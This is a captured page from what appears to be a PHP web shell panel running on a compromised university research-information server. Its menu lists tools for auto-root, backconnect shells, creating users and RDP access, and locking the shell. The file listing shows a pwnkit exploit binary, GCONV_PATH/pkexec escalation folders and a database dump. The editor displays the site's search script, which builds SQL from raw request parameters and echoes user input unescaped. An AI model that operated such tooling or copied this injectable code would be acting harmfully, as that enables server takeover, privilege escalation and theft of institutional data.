Linux webstaff 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64
nginx/1.22.1
: 202.29.57.4 | : 216.73.216.61
Cant Read [ /etc/named.conf ]
8.4.15
web2
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
clients /
client2 /
web2 /
web /
ris /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
_test
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
mods
[ DIR ]
drwxr-xr-x
pics
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_config.php
247
B
-rw-r--r--
_json.php
747
B
-rw-r--r--
_lib.php
1.06
KB
-rw-r--r--
action.php
602
B
-rw-r--r--
admin.php
4.42
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
ajax.php
1.08
KB
-rw-r--r--
areas_of_operation.php
11.18
KB
-rw-r--r--
areas_of_operation_test.php
11.18
KB
-rw-r--r--
footer.php
265
B
-rw-r--r--
inde-4.php
871.03
KB
-rw-r--r--
index.php
11.8
KB
-rw-r--r--
index1.php
11.98
KB
-rw-r--r--
innovation_find.php
11.56
KB
-rw-r--r--
innovation_fox.php
584
B
-rw-r--r--
innovations.php
13.44
KB
-rw-r--r--
localhost.sql
1.8
MB
-rw-r--r--
publication_find.php
11.87
KB
-rw-r--r--
publications.php
21.83
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
research_find.php
10.06
KB
-rw-r--r--
research_view.php
8.06
KB
-rw-r--r--
researcher_faculty.php
9.87
KB
-rw-r--r--
researcher_find.php
9.52
KB
-rw-r--r--
researcher_info.php
13.07
KB
-rw-r--r--
researchers.php
15.65
KB
-rw-r--r--
researches.php
16.27
KB
-rw-r--r--
scan.php
0
B
-rw-r--r--
tenka.massupload.v1.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : publication_find.php
<?php include "_lib.php"; $kw = $g_util->getParam('kw', ''); $find_in = $g_util->getParam('find_in', 'title'); $sql = "SELECT MAX(public_year) AS max_year, MIN(public_year) as min_year FROM publication WHERE public_year > 0 "; $year = $g_db->getObject($sql); $start = $g_util->getParam('start', $year->min_year); $stop = $g_util->getParam('stop', $year->max_year); $sql_cond = " AND public_year BETWEEN '".$start."' AND '".$stop."' "; ?> <!DOCTYPE html> <html lang="en"> <head> <title>ระบบสาระสนเทศงานวิจัย สถาบันวิจัยและพัฒนา มหาวิทยาลัยราชภัฏศรีสะเกษ </title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" type="image/x-icon" href="images/logo.ico"> <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css"> <link rel="stylesheet" href="includes/font-awesome/css/font-awesome.min.css"> <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Sans+Thai&display=swap"> <style> body,h1,h2,h3,h4,h5 {font-family: 'Noto Sans Thai', sans-serif; color:#333333;} body {font-size:16px;} *{margin: 0; padding: 0; box-sizing: border-box; list-style: none; text-decoration: none; font-family: 'Noto Sans Thai', sans-serif;} .w3-half img{margin-bottom:-6px;margin-top:16px;opacity:0.8;cursor:pointer} .w3-half img:hover{opacity:1} .ris-dark {background-color:#232659; color:#FFF;} .ris-light {color:#f4c213;} .ris-hover:hover {background-color:#f4c213!important; color:#232659!important;} .ris-active {background-color:#f4c213; color:#232659;!important} .ris-link {color:#000088!important;} .ris-link-hover:hover {color:#880000!important;} </style> <script src="includes/amcharts4/core.js"></script> <script src="includes/amcharts4/charts.js"></script> <script src="includes/amcharts4/themes/animated.js"></script> </head> <body> <!-- Sidebar/menu --> <nav class="w3-sidebar ris-dark w3-collapse w3-top w3-padding" style="z-index:3;width:250px;" id="mySidebar"><br> <a href="javascript:void(0)" onclick="w3_close()" class="w3-button w3-hide-large w3-display-topleft" style="width:100%;font-size:22px">X</a> <div class="w3-container"> <h3 class="w3-padding-16 ris-light" style="font-weight: bold;">RIS SSKRU</h3> </div> <div class="w3-bar-block"> <a href="index.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-home" aria-hidden="true"></i> หน้าหลัก</a> <a href="researches.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-file-text-o" aria-hidden="true"></i> งานวิจัย</a> <a href="researchers.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-users" aria-hidden="true"></i> นักวิจัย</a> <a href="publications.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-active"><i class="fa fa-newspaper-o" aria-hidden="true"></i> การตีพิมพ์</a> <a href="innovations.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-cogs" aria-hidden="true"></i> นวัตกรรมและสิ่งประดิษฐ์</a> <a href="areas_of_operation.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-globe" aria-hidden="true"></i> พื้นที่ดำเนินการ</a> <a href="admin.php" onclick="w3_close()" class="w3-bar-item w3-button w3-round-large ris-hover"><i class="fa fa-user-secret" aria-hidden="true"></i> ผู้ดูแลระบบ</a> </div> </nav> <!-- Top menu on small screens --> <header class="w3-container w3-top w3-hide-large w3-red w3-xlarge w3-padding"> <a href="javascript:void(0)" class="w3-button w3-red w3-margin-right" onclick="w3_open()">☰</a> <span></span> </header> <!-- Overlay effect when opening sidebar on small screens --> <div class="w3-overlay w3-hide-large" onclick="w3_close()" style="cursor:pointer" title="close side menu" id="myOverlay"></div> <!-- !PAGE CONTENT! --> <div class="w3-main" style="margin-left:250px;margin-right:0px"> <div class="w3-bottombar" style="padding-top:20px;padding-bottom:20px"> <div class="w3-row"> <div class="w3-col" style="width:140px"><img src="images/logo.png" class="w3-image w3-padding"></div> <div class="w3-rest"><br><h3>ระบบสารสนเทศงานวิจัย สถาบันวิจัยและพัฒนา มหาวิทยาลัยราชภัฏศรีสะเกษ<br> Research Information System(RIS)</h3></div> </div> </div> <div class="w3-panel"> <a href="index.php" class="ris-link ris-link-hover">หน้าหลัก</a> > <a href="publications.php" class="ris-link ris-link-hover">การตีพิมพ์</a> > ผลการค้นหา </div> <div class="w3-panel w3-center"> <center> <form action="publication_find.php"> <div class="w3-cell"> <input type="text" name="kw" value="<?=$kw?>" class="w3-input w3-large w3-border w3-text-blue" placeholder="ค้นหางานวิจัย..." style="width: 350px;"> <input type="radio" name="find_in" value="title" class="w3-radio"<?=($find_in=='title')?' checked':''?>> จากชื่อเรื่อง <input type="radio" name="find_in" value="name" class="w3-radio"<?=($find_in=='name')?' checked':''?>> จากชื่อ - นามสกุล นักวิจัย <div class="w3-cell-row w3-panel"> <div class="w3-cell">ปีงบประมาณ: </div> <div class="w3-cell"> <select id="start" name="start" class="w3-select w3-border w3-text-indigo" required> <?php print $g_util->optionIntRev($start, $year->max_year, $year->min_year); ?> </select> </div> <div class="w3-cell" style="width: 60px;"> ถึง </div> <div class="w3-cell"> <select id="stop" name="stop" class="w3-select w3-border w3-text-indigo" required> <?php print $g_util->optionIntRev($stop, $year->max_year, $year->min_year); ?> </select> </div> </div> </div> <div class="w3-cell"> <button type="submit" class="w3-button w3-large w3-border w3-blue"><i class="fa fa-search" aria-hidden="true"></i> ค้นหา</button> </div> </form> </center> </div> <p> </p> <?php $sql = "SELECT publication.id, publication.title, publication.researcher_id, faculty.name AS faculty_name, researcher.tname AS researcher_tname, researcher.name AS researcher_name, publishdb.name AS publishdb_name, publication.journal, publication.public_year, publication.public_weight, publication.file FROM publication LEFT JOIN researcher ON (publication.researcher_id=researcher.id) LEFT JOIN faculty ON (publication.faculty_id=faculty.id) LEFT JOIN publishdb ON (publication.publishdb_id=publishdb.id) WHERE 1 "; if ($kw != '') { if ($find_in == 'name') { $sql .= " AND(researcher.name LIKE '%".$kw."%') "; } else { $sql .= " AND(publication.title LIKE '%".$kw."%') "; } } $sql .= $sql_cond; $sql .= " ORDER BY publication.id DESC "; $g_db->pagesize = 10; $sql = $g_db->createPage($sql); $rows = $g_db->getObjects($sql); ?> <?php $g_db->page_url = "publication_find.php?kw=".$kw."&fac_id=".$fac_id."&page="; ?> <div class="w3-margin"> <h3>ผลการค้นหาจาก <?=($find_in=='name')?'ชื่อ-นามสกุลนักวิจัย':'ชื่อเรื่อง'?> "<?=$kw?>" ปีงบประมาณ <?=$start?> ถึง <?=$stop?></h3> <?php if (count($rows) < 1) { ?> <h4 class="w3-center w3-text-red">--- ไม่พบการตีพิมพ์ ---</h4> <?php } else { $g_db->pagination(); ?> <?php for ($i=0; $i<count($rows); $i++) { $row = $rows[$i]; if ($find_in == "name") { $row->researcher_name = str_replace($kw, "<span class=\"w3-yellow\" style=\"font-weight:bold;\">".$kw."</span>", $row->researcher_name); } else { $row->title = str_replace($kw, "<span class=\"w3-yellow\" style=\"font-weight:bold;\">".$kw."</span>", $row->title); } ?> <div class="w3-row w3-round-large w3-border w3-margin-bottom w3-hover-light-grey"> <div class="w3-rest w3-padding"> <?php $file = "files/publication/".$row->file; if (is_file($file)) { ?> <div class="w3-panel"><h4><a href="<?=$file?>" target="_blank" class="ris-link ris-link-hover"><?=$g_db->pageNo($i)?>. <?=$row->title?></a></h4></div> <?php } else { ?> <div class="w3-panel"><h4><?=$g_db->pageNo($i)?>. <?=$row->title?></h4></div> <?php } ?> <div class="w3-panel w3-large">นักวิจัย : <a href="researcher_info.php?res_id=<?=$row->researcher_id?>" class="ris-link ris-link-hover"><?=$row->researcher_tname?> <?=$row->researcher_name?></a></div> <div class="w3-panel">สังกัด : <?=$row->faculty_name?></div> <div class="w3-panel">แหล่งตีพิมพ์ : <?=$row->journal?></div> <div class="w3-panel">ปีที่เผยแพร่ : <?=$row->public_year?></div> <div class="w3-panel">ฐานข้อมูลที่ตีพิมพ์ : <?=$row->publishdb_name?></div> <div class="w3-panel">ค่าน้ำหนัก : <?=sprintf("%0.2f", $row->public_weight)?></div> </div> </div> <?php } $g_db->pagination(); } ?> </div> <?php include("footer.php"); ?> </div> <script> // Script to open and close sidebar function w3_open() { document.getElementById("mySidebar").style.display = "block"; document.getElementById("myOverlay").style.display = "block"; } function w3_close() { document.getElementById("mySidebar").style.display = "none"; document.getElementById("myOverlay").style.display = "none"; } // Modal Image Gallery function onClick(element) { document.getElementById("img01").src = element.src; document.getElementById("modal01").style.display = "block"; var captionText = document.getElementById("caption"); captionText.innerHTML = element.alt; } </script> </body> </html> <?php $g_db->close(); ?>
Close